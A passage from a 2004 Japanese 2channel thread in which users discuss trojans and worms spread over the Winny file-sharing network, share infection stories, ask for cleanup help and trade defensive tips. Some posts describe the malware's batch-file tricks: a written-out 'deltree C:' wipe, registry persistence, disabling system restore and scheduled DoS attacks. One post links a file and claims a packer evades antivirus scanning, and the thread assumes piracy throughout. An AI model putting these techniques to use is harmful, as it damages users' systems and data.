856 :[名無し]さん(bin+cue).rar:04/04/14 21:58 ID:YUiJkXPa
>>855ありがd!!即調べて見るよ!!

857 :[名無し]さん(bin+cue).rar:04/04/14 22:05 ID:vu/1Tiij
>>848
ソイツの拡張子がiniだったら暴れますよ?w

>>855
少し休め、なっ。疲れてんだよ。つミ旦 ホレ之飲メ
それとウィルスソフトはあんまり重複してインスコせぬほーが…ケンカ始める場合ガ
インスコ1、オンライン複数あたりでどーよ?

858 :[名無し]さん(bin+cue).rar:04/04/14 22:05 ID:JRM18J+z
      犬      の     う    ん こ  と

e x e は踏むな。

859 :[名無し]さん(bin+cue).rar:04/04/14 22:26 ID:0UJ4xSRL
>>857

∧_∧
( ´・ω・) ありがたくいただきます
( つ旦O
と_)_)

>それとウィルスソフトはあんまり重複してインスコせぬほーが…ケンカ始める場合ガ
>インスコ1、オンライン複数あたりでどーよ?

ん?いや俺は……
ごめんちょっと書き方間違えたというか付け加え忘れたというか
俺もその意見には賛成

>>832に いやひとつで十分

を付け加えといて
やっぱり疲れてるみたい

俺はバスターだけ入れてる
後はアイコン変えたり拡張子表示させるっていうごく初歩的なことをやってるだけ
アイコンかえるだけでかなり違うと思うよ
シングルクリックだけどw


860 :[名無し]さん(bin+cue).rar:04/04/14 22:33 ID:yav+P22B
あのよー
nyやめれば済む話じゃねの?

861 :[名無し]さん(bin+cue).rar:04/04/14 22:37 ID:YsYnOUVx
>>860
結論が出たようですね

862 :[名無し]さん(bin+cue).rar:04/04/14 22:41 ID:kx87TP+p
>849
>853
>854

レスどもー
kerioFW+AVGを過信してました
自分で起爆スイッチおしたようなモノですね
自動起動も気が付かなかったし

レジ書き換えやら不振なアプリの起動監視はこういうのは有効なのかな
System Safety Monitor
ttp://pc3.2ch.net/test/read.cgi/sec/1061788093/

ワーム・ウイルスとは違うのでスレ違いでした

863 :[名無し]さん(bin+cue).rar:04/04/14 22:45 ID:sUX4eE44
>>1-862
お前ら猫のウンコ踏め!!

864 :[名無し]さん(bin+cue).rar:04/04/14 22:50 ID:VGX33pJN
[18禁ゲーム] [040402] CHAIN TRAP〜復讐の淫罠〜 (ccd).rar

コレが原因なの?
もう少しで落ちきるから踏んでみようかな

865 :[名無し]さん(bin+cue).rar:04/04/14 22:59 ID:S/OcWE0J
>>863
猫のウンコは埋まってるので探すのが難しい。

866 :[名無し]さん(bin+cue).rar:04/04/14 23:00 ID:WyAIG9WE
犬のウンコ踏む奴の方がマシだろ。
キンタマ踏む奴は救いようがない。

867 :[名無し]さん(bin+cue).rar:04/04/14 23:02 ID:sUX4eE44
誰か大空寺のAA貼ってくれるかと思ったのによ・・・(´・ω・`)

868 :[名無し]さん(bin+cue).rar:04/04/14 23:06 ID:YsYnOUVx
いいこと考えた。
LANきって、バックアップとってから
EXE踏みまくろう♪

869 :[名無し]さん(bin+cue).rar:04/04/14 23:06 ID:yxMvV9sC
大空寺あゆ(・▽・)萌えっ!!!

870 :[名無し]さん(bin+cue).rar:04/04/14 23:19 ID:Cba6HWPZ
次のスレの>>12のテンプレには
○○の値のデータをxからyに設定みたいにデフォルトの数値の記入も頼む。
          〜〜

871 :[名無し]さん(bin+cue).rar:04/04/14 23:25 ID:Cba6HWPZ
あと、

(一般コミック) [藤代健] ながされて藍蘭島 第03巻るくるく.zip
a6142553f06ccf571890508fca017f75

の中にウィルスチェックでも感知しないexeファイルを発見。
気をつけろ。

872 :[名無し]さん(bin+cue).rar:04/04/14 23:33 ID:DlERuW8h
酒飲みながらnyで落としたファイルの整理やっちゃダメね、
拡張子ちゃんと表示してるというのにフォルダアイコンのEXEを
ダブルクリックしてキンタマに感染してもうた(´・ω・`)

すぐにny停止したから拡散はしてないと思うけど、
なんか切ないの、みんなも気をつけてね(´・ω・`)

873 :[名無し]さん(bin+cue).rar:04/04/14 23:36 ID:1R39NdAB
こんなん出ました〜
http://uploader.org/normal/data/up5316.jpg

874 :[名無し]さん(bin+cue).rar:04/04/14 23:36 ID:vu/1Tiij
>>859
…おいしいですか、ウチの特製exe茶はw(油断大敵でつ)

あとはJavaとactivX、CDオートラン切っとけ、とか
Admin権限でやるな、とか etc.

ウチのマイコンピュータは「おにぎり」が「ワッショイ」柄♡ ショーモナ

875 :856:04/04/15 00:02 ID:zMFpYZsd
調べてみたんだがおかしい箇所は無かった。。
ちゃんと、アイコンも変えてるし、拡張子表示させたりしてし、毎日ノートンでスキャンしてるのに…
てか、nyはnao祭りでキンタマ知ってから起動させてなかったの…
なんなんだろ?このメモ帳…_| ̄|○
>>857
iniだよ…暴れるって何?(;・∀・)そんなに、やばーなの??


876 :[名無し]さん(bin+cue).rar:04/04/15 00:05 ID:bVpede8J
時々HDがガリガリいい出すんですがこんなことってありますか?

877 :[名無し]さん(bin+cue).rar:04/04/15 00:09 ID:Cy/87cI6
exe踏みたい衝動に負けて、昨日中古ノートPC
買ってきた。さあ、キンタマ、ぬるぽ踏みまくろう。

878 :[名無し]さん(bin+cue).rar:04/04/15 00:13 ID:mg8T4T20
>>873
グロ画像踏んじまったyo.....

879 :857:04/04/15 00:15 ID:RiTcJcyy
>>875
ぶっ。ははははマジ当たりですか(ヤッパリ)…暴れる気力も失せる…
安心しろ。そりゃ設定ファイルだ・・・Desktop.iniはあるのが普通(苦笑

暴れるのは私だ、私。は、は、ははははは〜。w ♪You are an idio(ry…
おかしい箇所ないなら  と り あ え ず  安心汁。
とりあえず、ね(無保証)

880 :[名無し]さん(bin+cue).rar:04/04/15 00:16 ID:Wbmhvnkc
いい年してエロゲーすんなよ厨房たちw

881 :[名無し]さん(bin+cue).rar:04/04/15 00:18 ID:fxgmeKb9
>>875
“Desktop.ini” ファイルとは何ですか?

Desktop.ini ファイルには、ユーザーがファイル フォルダおよびそのコンテンツを参照する際に、それらが表示される方法に関する情報が保存されます。
Desktop.ini ファイルは、フォルダを表示するためには必要なく、すべてのフォルダに存在するものではありません。
Desktop.ini ファイルがフォルダに存在している場合、Desktop.ini ファイルにはそのフォルダにアクセスしているプログラムによって含まれる情報が異なります。
たとえば、Windows Explorer では、フォルダを示すアイコンの名前および場所、マウス ポインタをフォルダ上に配置する際に表示されるヒントのテキスト、またはフォルダに含まれるファイルを表示する方法を保存するために Desktop.ini が使用される場合があります。

882 :[名無し]さん(bin+cue).rar:04/04/15 00:23 ID:GUV3sD8d
いい年しかエロゲーできないんじゃないの?

883 :[名無し]さん(bin+cue).rar:04/04/15 00:29 ID:NDpIMKbc
txtファイルを装ったexeファイルで、クリック(実行すると)Winnyダウンロードフォルダ内のダウンロード済みフォルダ内のありとあらゆるファイルに拡張子exeがついていました。
それがどんどん増殖し始め、ダウンロードフォルダ内にあったすべてのファイルがそうなっていました(mpg、avi、jpgなどを除く)。しかもそれはzip、rar問わず圧縮ファイルの中の物にも及んでいました。
増殖後のexeは怖くて実行していませんが、いったいこれは何なんでしょうか。
ノートンは無反応で、最終的に再インストールしました。

884 :857:04/04/15 00:35 ID:RiTcJcyy

すまんマジでハナタレタ(爆笑)
く、苦しい。 藁藁藁 ゼーゼー

今後この手の赤っ恥を掻きたくなければ

   初心者の皆々様がた、

少しは自分で調べよーなっ♪www

>>883 >>1から(ry

885 :[名無し]さん(bin+cue).rar:04/04/15 00:35 ID:zMFpYZsd
>>879
>>881
そうなの?急にマイドキュメント、マイピクチャーとかに現れたからよっぽど危険な代物かと思ったよι(´Д`υ)
これは元々あるもんだと知って心から安心したよ。ホントにレスありがd(・∀・)!!
で、急に出てきたコレはどうしたら良いの?…ってもうスレ違いだと分かってるんだが、親切な人!!最後にお願い教えて!!



886 :[名無し]さん(bin+cue).rar:04/04/15 00:36 ID:ORF2vbbw
>>883
脳内妄想乙!( ´,_ゝ`)フフフ

887 :[名無し]さん(bin+cue).rar:04/04/15 00:38 ID:dwZc9PnF
>>883
ぬるぽ



888 :883:04/04/15 00:42 ID:NDpIMKbc
「・exeの前にスペースたくさん」これは分かっていたのですが、この時たまたま表示方法がならべて表示になっていて、拡張子がある場所が隣のファイルの並びにあるものだと思い込んでクリックしてしまいました。
ところで、これは流行っている仕込み方法なんですか?

889 :[名無し]さん(bin+cue).rar:04/04/15 00:49 ID:D9lrmlqX

    _, ._
  ( ゚ Д゚)うぅ…
  ( つ旦O
  と_)_)
    _, ._
  ( ゚ Д゚)   ガシャ
  ( つ O. __
  と_)_) (__()、;.o:。
          ゚*・:.。
駆除中




>>875 >>885
ウィルスではなかったようで…
間違った情報スマソ
というかそれだけの情報でまさかDesktop.iniだとはわからんかった
まあ勉強になったってことで許してでFA?
ウィルスにかかった時にはこれで冷静に処理できると思うよ
まあそんなことは無いに越したことは無いが

>で、急に出てきたコレはどうしたら良いの?…

多分フォルダオプションの表示いじって隠しファイル・・・のチェックを外したからだと思うが
無視したら?

でも俺のデスクトップにはでてないなぁ
前に出てた記憶があるが 他のフォルダには出てる
気になるなら隠しファイル・・・にチェック 推奨ファイル・・・にチェック でOK
俺は推奨ファイル・・・だけチェックしてる

890 :[名無し]さん(bin+cue).rar:04/04/15 00:55 ID:RiTcJcyy
>>885
だから自分で調べろ、と ドコマデ スットボケ トルダ

設定ファイルがないとゲイシOSが 泣ーきーまーすーよー。
もう忘れなさい、 次 回 の 珍 騒 動 ま で。

891 :[名無し]さん(bin+cue).rar:04/04/15 00:59 ID:fxgmeKb9
>>885,>>888
G(o^−^o)gle <検索しようね♪

892 :[名無し]さん(bin+cue).rar:04/04/15 00:59 ID:zMFpYZsd
>>889
漏れの説明不足だったんだよ。
そんな漏れに親切に本当にありがとう!!
焦ってワケワカランくなってたが、そうだよねフォルダオプションの表示いじれば良い話しだよね!!
漏れって本当にバカでアホで…こんな漏れにみんなありがとですた( ;∀;) かんどー

893 :859=889:04/04/15 01:02 ID:D9lrmlqX
あれ?
ちゃんと名前欄打ったはずなのになぁ?

>>874 まさか毒入りとは・・・

>JavaとactivX、CDオートラン切っとけ、とか
>Admin権限でやるな、とか etc

ん〜俺はjavaもactivXも切ってないなぁ しかもAdminだし
AutoRunは切ってるけど

javaとactivXは何のことかわけわからん ブラウザのセキュリティ関係いじるときに
何度も調べなければって思てるんだけど
なんとなくはわかるんだけどね

というか俺も実際こんなこともわからん 初心者とはいわないけど
にたようなもんだと思ってる
えらそうにいってるけど あんまりかわらんよ
と いうことでみんなガンガレ!!

894 :[名無し]さん(bin+cue).rar:04/04/15 01:10 ID:NDpIMKbc
>>891 よかったら教えてくれるかな

895 :[名無し]さん(bin+cue).rar:04/04/15 01:15 ID:RiTcJcyy
>>859=>>889
毒入りとは そんな人聞きの悪い、お代官様♡
ただのwhiterですよwhiter。頭もHDDもサッパーリしたでショ。

>javaもactivXも切ってないなぁ
ブラウザの「セキュリティ」を「高」にすればヨシ。
ベクターとかでファイルダウソするために
「ファイルのダウソ」は許可しておく事。(下の方にある。チェックせよ)

切っておくとブラクラが怖くなくなる副作用つき。
ただしウザイ ポップアップが出ることも。
Win Updateも切り替えなくちゃできない(T T)

さぁ、そろそろ逝くか。

896 :[名無し]さん(bin+cue).rar:04/04/15 01:18 ID:GrVcH5Gf
まあautorun切ったところで大した意味はない罠。
どうせ偽インストーラ実行するんだから。

897 :[名無し]さん(bin+cue).rar:04/04/15 01:19 ID:RiTcJcyy
>>891
ん?>>891のスリーサイズのことか?
123cm、123cm、123cmだ。メモれよ、若人w

898 :872:04/04/15 01:20 ID:O07AxXtd
まいった、レジストリエディタがメモ帳に書き換えられてて
もとのエディタに復旧できないです。
OSはXPなのですが、復旧に使用する.cabファイルにどれを
指定すればいいのかがわからんのです、いくつか試したけれど・・・

どなたか教えてくれると助かります(´・ω・`)

899 :[名無し]さん(bin+cue).rar:04/04/15 01:22 ID:RiTcJcyy
>>894 だった
ううう、ID:D9lrmlqX の呪いじゃ。今度は私がアンカーミス。(鬱
今度こそ吊ってくる。

900 :[名無し]さん(bin+cue).rar:04/04/15 01:33 ID:NDpIMKbc
891のfxgmeKb9っていうのは897のRiTcJcyyと一緒ってことかよ

901 :ID:D9lrmlqX:04/04/15 01:33 ID:D9lrmlqX
>>899
ひどいなぁww

多分疲れてるんだよ
|ω・`)ノ旦~ 
これどうぞ
whiterは入ってないから安心しる

と いうことで寝ます

みなさんも早く寝たほうがいいですよ
疲れてると判断が鈍って・・・(ry




∧_∧ コソーリ
( ´・ω・)
( つ  つ毒
     ∵ パラパラ
     旦

902 :[名無し]さん(bin+cue).rar:04/04/15 01:35 ID:IHJhML56
警察に逮捕されようが
キンタマウィルスに感染しようが
HD全消しウィルス食らおうが
全部自己責任です。

・・・Web割れのころなら皆知ってたはずなんだがなぁ

「Take your own risk」


今時の香具師らはいきなりnyやってんのかねぇ・・

903 :[名無し]さん(bin+cue).rar:04/04/15 01:39 ID:LiU9ljYw
>>902
まさしく、その通りです。
それを嘆かわしいとか思うかはまた別の問題なのですが。

ただ、今回はライトユーザがほしがりそうな有名アルバムに浸食していることや
exeを踏ませる誤誘導の仕方が非常に優れているということで勉強になったなあと。


904 :[名無し]さん(bin+cue).rar:04/04/15 01:39 ID:2P3hQnh8
エロゲで感染する、ドラクエの呪いがかかるウィルスの対処法・・教えてもらえないだろうか…

part15にあるって書いてるんだが・・dat落ちで見れないの・・・・・

905 :[名無し]さん(bin+cue).rar:04/04/15 01:47 ID:J4ceYeNe
にくちゃんねる 過去ログ墓場
http://makimo.to/2ch/

とりあえずログはここにある

906 :872:04/04/15 01:48 ID:O07AxXtd
ライトユーザってのは俺の事っぽい(;´Д`)
自力で何とかします、失礼しました。

907 :[名無し]さん(bin+cue).rar:04/04/15 01:59 ID:2P3hQnh8
>>925
過去ログ参照しましたが・・・

そのトラップ最近流行っているらしい。ウィルス感染の確認を急げ。

しか報告なかったです。

まだ具体的な対処法は発見されていませんか?

他の方もアドバイスおねがいします・。

908 :[名無し]さん(bin+cue).rar:04/04/15 02:15 ID:7MJvs4TZ
最印す子すれば?な、そうだよな?>>925

909 :[名無し]さん(bin+cue).rar:04/04/15 02:19 ID:2P3hQnh8
( ̄□ ̄;)!!

>>905でした・・・

セーフモードで、bug.exeを消したんですが、再起動すると、DOSが立ち上がってしまう
んです・・・

こっからの対処法を・・お願いします・・

910 :[名無し]さん(bin+cue).rar:04/04/15 02:20 ID:D9lrmlqX
>>895 = >>899

おっと お礼言うの忘れてました
サンクス

明日試してみます

911 :[名無し]さん(bin+cue).rar:04/04/15 02:38 ID:dwZc9PnF
結局はこういうことよ。

>>2-910に対する有効な対処法
LAN切り離し→データのバックアップ→HDDフォーマット→OS再インスコ+アプリ再インスコ

nyやめますか、それとも…

912 :[名無し]さん(bin+cue).rar:04/04/15 04:17 ID:Qb8kbx1S
しかし、結構踏んでるんだな
「踏むヤツは如何なる状況でも踏むべくして踏む」って事か

913 :[名無し]さん(bin+cue).rar:04/04/15 04:40 ID:Wbmhvnkc
お前ら何回感染すれば

914 :[名無し]さん(bin+cue).rar:04/04/15 06:58 ID:pddA2mEr
みんなマゾですね(゚∀゚)

915 :[名無し]さん(bin+cue).rar:04/04/15 07:03 ID:0GA4bFXQ
会社行ってくる。帰ってきたらまた遊んでやる。ノシ

916 :[名無し]さん(bin+cue).rar:04/04/15 07:24 ID:DkIKj4lb
>>915       / //     /   l    |   ヽ    ヽ  ト、!
          レ′′ ,イ   / ,イ ハ   l1 l\ ヽ    i  |
           / //  /|/、|/  ヽ.  | ヽ!  \イヽ   ト、 !
           レ' /| ,イ r=┬=、__ ヽ/___,ィ=┬=ァ〉、 l l′
              ∨! ハ`   じ' `     ′じ!   '/ ヽ」ノ  
              /レイ  ! `ー'" .:::::::::::.... `ー' ,'   | ヽ うぅ...
              /  | ヽ        '         ,'  |   ヽ
            /   |  \  -ー----一-  ,.イ  N    ',
            ,'    ヽ!   ` 、     , -'" |  |     |
           ,'      ヽ!  /ヽ` ー''"ノヽ  レ'___     |
           !   ,イ ̄TTーく  \_/  〉‐' ̄!|  \   |
                 l                  .|                 /
            / ̄ ̄ ̄ ̄   、    /    ー―十―一         ー―イ―一
   ー―一    /  ―ヒコ―    ヽ、 /      ヽ、 |  ノ      /     /    \
           /   __       ,r'     ー――木――一   /      ノ
          /    、 /      /         / .| \     /         |
 ー―――一  /     X       (        /   .|   \   i  /⌒ヽ   ,r"| ̄
         /    / ヽ、      \__  /     |    ヽ、 ヽ/   ヽ、 .( ,ノ  



917 :[名無し]さん(bin+cue).rar:04/04/15 08:55 ID:ORF2vbbw
>>916
アニメAAはキモイから止めとけ
世の中で、青年やいい年した大人にも関わらずアニメが好きな奴
程軽蔑すべき対象はないな。もはや鬼畜にも劣る行為だよ。

まあ小学生なら話は別だがね・・・

918 :[名無し]さん(bin+cue).rar:04/04/15 09:31 ID:Lz2/3xSj
彼らの頭は小学生以下ですよ。

919 :[名無し]さん(bin+cue).rar:04/04/15 09:34 ID:AQHH5+i5
この速さなら言える

>>917-999





















ぬるぽ

920 :[名無し]さん(bin+cue).rar:04/04/15 09:46 ID:pVLPl4Oi

       ガッ  ☆
 ( ・∀・)っ―[]M/
[ ̄ ̄ ̄]ヾ(`Д´)ノ←>>919


921 :[名無し]さん(bin+cue).rar:04/04/15 09:50 ID:CcjYo981
>909
漏れもマヌケにもひっかかった。
たぶん過去ログ調べても回答は過去にも書いてない。
それについては答えは各自で考えなきゃいけないのがこのスレの方針らしい。(考える、ほどの物でも無いが)
というわけで過去に誰かが出したヒントだけ転載しておく。

−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
553 名前: [名無し]さん(bin+cue).rar 04/02/23 21:49 ID:rwacU+gP

>>549
起動するとき何を読み込んで実行するか考えればチェックするところは分かるだろ。
それが分からないなら足を洗った方が。

922 :[名無し]さん(bin+cue).rar:04/04/15 10:49 ID:CoUxB+56
>>917
そんなに褒めるなよ…
照れるじゃないか。

923 :[名無し]さん(bin+cue).rar:04/04/15 10:58 ID:VB7Fz2u9
ぶっちゃけ一ヶ月でny飽きたわけですが
ナイスな自作ラブポエムなんてそうそう落ちてないねぇ

924 :[名無し]さん(bin+cue).rar:04/04/15 14:03 ID:xPoeTOpk
>>923
落とすことばかり考えずにうpすることも考えなさい。
でもあなたのポエムはみたくないような気がします。あしからず

925 :[名無し]さん(bin+cue).rar:04/04/15 16:22 ID:6FFgFT6T
                          _| ̄|○_| ̄|○_| ̄|○
                    _| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○
                     _| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○
                   _| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○
              _| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○
             _| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○
             _| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○
          _| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_ト ̄|○_| ̄|○
          _| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○
           _| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○
           _| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○
    / ̄ ̄ ̄\ _| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○
   |...       |_| ̄|○_ト ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○
   |::: ●) ●)|  _| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○
   ヽ:::::::....∀...ノ _| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○ 
    /ヽ○==○_| ̄|○  _| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○
    /  ||_ |_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○
    し' ̄(_)) ̄(_)) ̄ ̄(_)) ̄ ̄(_)) ̄ ̄(_)) ̄ ̄(_)) ̄ ̄(_)) ̄ ̄(_)) ̄ ̄(_)) ̄ ̄(_)) ̄ ̄(_))
厨房へようこそ!

926 :[名無し]さん(bin+cue).rar:04/04/15 16:23 ID:528e42oU
>>917
ぶっちゃけありえない

927 :[名無し]さん(bin+cue).rar:04/04/15 17:21 ID:BqD5yclg
>>925
なんか変なの2匹ほど混ざってるぞ

928 :[名無し]さん(bin+cue).rar:04/04/15 17:42 ID:u6IuoA1e
>>927
それは「真性」です。レア物なので生暖かく見殺しましょう

929 :[名無し]さん(bin+cue).rar:04/04/15 17:43 ID:E6feZDaI
>>909

>>794
>>826
昨日の俺の書き込みでも参考にしてくれ、ちなみに完全には復元で来てなかった…(やはり
復元ツールが再現できなかったか、消されたときに壊れていたか…
同一サイズのファイルが同じファイルに書き換えられていたりしたわ…
まぁ、それも一部だけど

930 :[名無し]さん(bin+cue).rar:04/04/15 20:01 ID:pWQB5Sk4
NeoLiteとezipで圧縮するとスキャンされない
http://upld.komugi.net/img/up220.zip

931 :[名無し]さん(bin+cue).rar:04/04/15 20:27 ID:QJNWNDiT
いやでも、ほんとみんな何落としてこんなにウイルスかかってんだ?
音楽CDや映画、エロビなら普通にレンタルすりゃいいだろ?漫画なら買えよ?

あ、ゲームとかアプリでかかるのは.exe踏んでるからあたりまえだわな

932 :[名無し]さん(bin+cue).rar:04/04/15 21:03 ID:X4IkHOUF
Autorunの奴はエロゲだな。
俺は(結果的に)これ収集してたからわかるが、かなり粗雑な作りだよ? スキルも何もあったもんじゃない。

5種類くらいあって、最初期のものはSetup.batの中にdeltreeコマンドが書かれてる。
確認無しで消すようになってるけど、「deltree C:」の行ノートン先生にはじかれる。他はムリ。
ていうか、こんなの(Setup.bat)にかかる奴の気が知れない。

以降のは、Setup.exe(多分ランチャソフト)からbatが起動するように指定してある。
batの内容は様々で、大抵はbug.exeで気をそらしつつファイル(レジストリ)全削除って感じ。
スタートアップフォルダにbatを移動する奴と、レジストリを使うタイプがある。
bat内で使ってるコマンドはREG ADDとかREG DELとかRMとか。

最近のも相変わらずbatを使ってるけど、初期に比べると多機能になってる。

933 :[名無し]さん(bin+cue).rar:04/04/15 21:28 ID:X4IkHOUF
batやhtmlの中身を直接書くのも気が引けるので、要点だけ。
htmlは裏でACCSとJASRACに定期的に田代砲を撃つようにしてる。
batには、システムの復元の無効化、Windowsファイル保護の無効化、使用者名変更、
レジストリエディタ系と保護機能で復元する時用のバックアップファイルの削除、
削除したファイルと同名のフォルダの作成、強制再起動、DOS攻撃のスケジュールなど。

DOS攻撃用のHTMLの削除を検知すると更に
壁紙のエロ画像への変更、Cドラ以外の全削除、画面のプロパティの無効化など。


DOSって結構色々出来るものなんだと知ったよ。
ただ、DOSのATコマンドでACCS・JASRACへの攻撃をスケジュールしてるんだが、これは面倒だね。
このコマンドを知らない人間はまず気づかない。レジストリの方もRunじゃなくRunOnceを使ってて気づきにくいかも。
あと強制再起動がかかるのでレジストリを確認してから、とかプロセスをチェック、とかできない。

934 :[名無し]さん(bin+cue).rar:04/04/15 23:57 ID:lIYEXdAv
とりあえず漏れはautorunにひっかかったバカなんだが
元々WINNY TIPSのページを見て遮二無二にとにかく導入。
後は何も気にせずに変な物さえ実行しなければいいや、
とお気楽ダウソ生活を送ってたって所かな。

WINNYのドライブは完全に隔離してて今回は被害はほぼ皆無だったから
正直な所かなり安い授業料になった。
正にあれに入ってるreadme通り初心者として痛い目にあって少しは勉強できたかも知らん。
このスレの存在も知って調べてる内に色々注意点とかもわかったしたぶん現存の分にはそうそう
ひっかからない程度には知識はついたと思う。

ま、全国にはまだ漏れのように何も警戒心の足りないWINNY猿がたくさん居るんだろう。

935 :[名無し]さん(bin+cue).rar:04/04/16 00:10 ID:eRJQI+tO
結局、ぬるぽに感染するとどうなるん?

936 :[名無し]さん(bin+cue).rar:04/04/16 00:27 ID:D3gA9LKp
もしかして932と933は神?

937 :[名無し]さん(bin+cue).rar:04/04/16 02:07 ID:kY0CXhG5
                          _| ̄|○_| ̄|○_| ̄|○
                    _| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○
                     _| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○
                   _| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○
              _| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○
             _| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○
             _| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○
          _| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_ト ̄|○_| ̄|○
          _| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○
           _| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○
           _| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○
    / ̄ ̄ ̄\ _| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○
   |...       |_| ̄|○_ト ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○
   |::: ●) ●)|  _| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○
   ヽ:::::::....∀...ノ _| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○ 
    /ヽ○==○_| ̄|○  _| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○
    /  ||_ |_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○_| ̄|○
    し' ̄(_)) ̄(_)) ̄ ̄(_)) ̄ ̄(_)) ̄ ̄(_)) ̄ ̄(_)) ̄ ̄(_)) ̄ ̄(_)) ̄ ̄(_)) ̄ ̄(_)) ̄ ̄(_))
厨房病院へようこそ! 今日も患者が一杯!

938 :[名無し]さん(bin+cue).rar:04/04/16 02:15 ID:pT7ivgVW
>>937

勃起してる香具師が2匹

939 :[名無し]さん(bin+cue).rar:04/04/16 03:20 ID:YWKbqfNM
kintama

940 :[名無し]さん(bin+cue).rar:04/04/16 03:41 ID:lDHPWEBt
>>932-933
もっと講義してよ、プロフェッサー。

941 :[名無し]さん(bin+cue).rar:04/04/16 04:32 ID:lgIHBsIs
nin

942 :[名無し]さん(bin+cue).rar:04/04/16 06:20 ID:4xAtuvM1
ウィルスコレクターの俺としては
このスレお気に入りなんだよね。
作者さんがんばって

943 :[名無し]さん(bin+cue).rar:04/04/16 08:34 ID:w4c7JkHf
久々にny起動したらANTINNYらしきものに感染してしまった…
ここのテンプレとか見て手動で削除したつもりなんだけど、ちょっと不安

ファイル検索で更新されたファイル(.folderとか.text.exe)を探して削除
んでフォルダのアイコンのSVCHOST.EXEを削除
タスクマネージャを起動してみたらなんかCPU使用率70%使ってるんで
原因だったSERVICES.EXE(小文字じゃない)を削除
systemフォルダのiniは問題なし、怪しいスタートアップもなし
再起動してみてもUPUpfolder.txtも書き換えられなくなったし
変なファイルも作られなくなったし大丈夫かなと思うんだけど
SERVICES.EXEとSVCHOST.EXEで間違いないと思うんだけど、
こいつらが本体な場合はレジストリ書き加えないの?
WINDOWS起動すると(正規の小文字の名前のがあっても)勝手に起動するからとか?

944 :[名無し]さん(bin+cue).rar:04/04/16 10:33 ID:HZev6eWt
>>936 >>940
おまえら底無しのバカ認定

945 :[名無し]さん(bin+cue).rar:04/04/16 12:02 ID:lGjDiK42
何でいまさらANTINNYにひっかかるぅ?ていうレスが多いけど、
10万超えるというユーザーの多くは、NHKみて始めたり、コンビニで本みて始めた人間ばっかでしょ。
普通に被害にあうのは自然だと思うけどね。
 
昔みたいに、隠し突破してHPはいって、さらにファイル自体も隠し。
なんていうのを経験してる人間なら、そうはひっかからないでしょうけどさ。


946 :[名無し]さん(bin+cue).rar:04/04/16 12:27 ID:YxpZBLbs
つうかエクスプローラを大きいアイコン表示で使ってるような人に
この世界に来て欲しくないな

947 :[名無し]さん(bin+cue).rar:04/04/16 12:43 ID:Q4SDoKTm
ちょい質問

・CCDはautorunを切ってdaemonでマウントして
 中の実行ファイル(setup.exe)をアンチウイルスソフトでチェックする。

とテンプレにあるが、他のCDイメージの場合はautorun系のウイルスプログラムが埋め込まれてる事は無いの?
教えてエロイ人

948 :[名無し]さん(bin+cue).rar:04/04/16 12:52 ID:0zpi6fQ5
>>947
isoだろうがbinだろうが同じ事だ。
ccdの流通量が多いからccdを例として書いてあるのだろう。

949 :[名無し]さん(bin+cue).rar:04/04/16 12:52 ID:5XCXRKgu
>947
エロくはないが、
ISOイメージでも、オリジナルと同一かどうか確認するすべが無い以上は、
Autorunで悪さをされる可能性はある。setup.exeなんて、何でも埋められるし


950 :[名無し]さん(bin+cue).rar:04/04/16 13:00 ID:Q4SDoKTm
>>948-949
成る程。
レス有難うエロイ人たち。

